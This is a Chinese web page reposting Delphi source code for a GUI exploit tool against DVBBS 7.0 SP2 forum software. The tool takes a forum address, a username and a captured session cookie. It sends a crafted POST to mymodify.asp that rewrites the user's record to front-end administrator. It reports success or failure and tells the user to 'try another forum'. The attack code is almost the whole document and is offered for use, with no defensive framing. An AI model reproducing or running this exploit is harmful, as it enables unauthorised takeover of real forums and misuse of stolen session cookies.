快捷導(dǎo)航

DVBBS7.0Sp2前臺(tái)提權(quán)漏洞利用程序[Kendy版]源碼

更新時(shí)間：2007年01月16日 00:00:00 作者：

作者：Kendy 文章來源：Kendy’s Blog
unit Unit1;
interface
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, ScktComp, StdCtrls, ComCtrls, WinSkinData, ShellApi;
type
  TForm1 = class(TForm)
　 Label1: TLabel;
　 Label2: TLabel;
　 Label3: TLabel;
　 Edit1: TEdit;
　 Edit2: TEdit;
　 Edit3: TEdit;
　 Button1: TButton;
　 ClientSocket1: TClientSocket;
　 GroupBox1: TGroupBox;
　 Memo1: TMemo;
　 Label4: TLabel;
　 StatusBar1: TStatusBar;
　 SkinData1: TSkinData;
　 procedure Button1Click(Sender: TObject);
　 procedure ClientSocket1Connect(Sender: TObject;
　　 Socket: TCustomWinSocket);
　 procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);
　 procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket;
　　 ErrorEvent: TErrorEvent; var ErrorCode: Integer);
　 procedure FormClose(Sender: TObject; var Action: TCloseAction);
  private
　 { Private declarations }
  public
　 { Public declarations }
  end;
var
  Form1: TForm1;
　Data: string;
implementation
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
var
  sUrl,sUsername,sPOST,sReferer,sHost,sCookie,S:string;
  i:integer;
begin
  ClientSocket1.Close ;
  if edit1.Text = ’’ then
  begin
　 StatusBar1.Panels[0].Text :=’請(qǐng)輸入論壇地址！’;
　 exit;
  end;
  if edit2.Text = ’’ then
  begin
　 StatusBar1.Panels[0].Text :=’請(qǐng)輸入你的論壇賬號(hào)！’;
　 exit;
  end;
  if edit3.Text = ’’ then
  begin
　 StatusBar1.Panels[0].Text :=’請(qǐng)輸入抓取的Cookie！’;
　 exit;
  end;
  memo1.Text :=’’;
  StatusBar1.Panels[0].Text :=’’;
  Label4.Caption :=’’;
  sUrl:=edit1.Text ;
  if Pos(’http://’,sUrl) <> 0 then
　 sUrl:=StringReplace(sUrl,’http://’,’’,[rfIgnoreCase]);
  sUsername:=edit2.Text ;
  sCookie:=edit3.Text ;
//--------Host-------------
  i:=Pos(’/’,sUrl);
  if i <> 0 then
　 sHost:=Copy(sUrl,0,i-1)
  else
　 sHost:=sUrl;
//--------Referer-----------
  sReferer:=’http://’ + sUrl + ’/mymodify.asp’;
//--------POST--------------
  sPost:=StringReplace(sUrl,sHost,’’,[rfIgnoreCase]);
  sPost:=sPost + ’/mymodify.asp?action=updat&username=’ + sUsername;
//--------數(shù)據(jù)包------------
  S:=’sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=images/userface/image1.gif|||32|||32|||2003-12-30%’;
  S:=S+’2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理員|||1||||||120|||115|||28|||0||||||210.41.235.200|||’;
  S:=S+’0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||Dvbbs&width=100&height=100’;
  S:=S+’&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=1&setuserinfo’;
  S:=S+’=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0’;
  S:=S+’&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0’;
  Data:=’POST ’+sPost+’ HTTP/1.1’+#13#10;
  Data:=Data+’Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*’+#13#10;
  Data:=Data+’Referer: ’+sReferer+#13#10;
  Data:=Data+’Accept-Language: zh-cn’+#13#10;
  Data:=Data+’Content-Type: application/x-www-form-urlencoded’+#13#10;
  Data:=Data+’Accept-Encoding: gzip, deflate’+#13#10;
  Data:=Data+’User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; TencentTraveler )’+#13#10;
  Data:=Data+’Host: ’+sHost+#13#10;
  Data:=Data+’Content-Length: 585’+#13#10;
  Data:=Data+’Connection: Keep-Alive’+#13#10;
  Data:=Data+’Cache-Control: no-cache’+#13#10;
  Data:=Data+’Cookie: ’+ sCookie+#13#10+#13#10;
  Data:=Data+S;
//--------開始發(fā)送數(shù)據(jù)包-------------
  ClientSocket1.Host := sHost;
  ClientSocket1.Port := 80;
  ClientSocket1.Open ;
  StatusBar1.Panels[0].Text :=’數(shù)據(jù)發(fā)送中...’;
end;
procedure TForm1.ClientSocket1Connect(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  Socket.SendText(Data);
end;
procedure TForm1.ClientSocket1Read(Sender: TObject;
  Socket: TCustomWinSocket);
begin
  memo1.Text :=Socket.ReceiveText ;
  if Pos(’您的修改信息已成功提交’,memo1.Text) <> 0 then
  begin
　 Label4.Caption :=’>>成功提升為前臺(tái)管理員！’;
　 StatusBar1.Panels[0].Text :=’成功，請(qǐng)重新登陸論壇！’;
  end
  else
  begin
　 Label4.Caption :=’>> Sorry，提權(quán)失敗’;
　 StatusBar1.Panels[0].Text :=’失敗，換個(gè)論壇試試。’;
  end;
end;
procedure TForm1.ClientSocket1Error(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
  ErrorCode:= 0;
  StatusBar1.Panels[0].Text :=’Error.....’;
  Exit;
end;
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
  ShellExecute(Handle,’open’,’http://aliwy.77169.com’,nil,nil,SW_SHOW);
end;
end.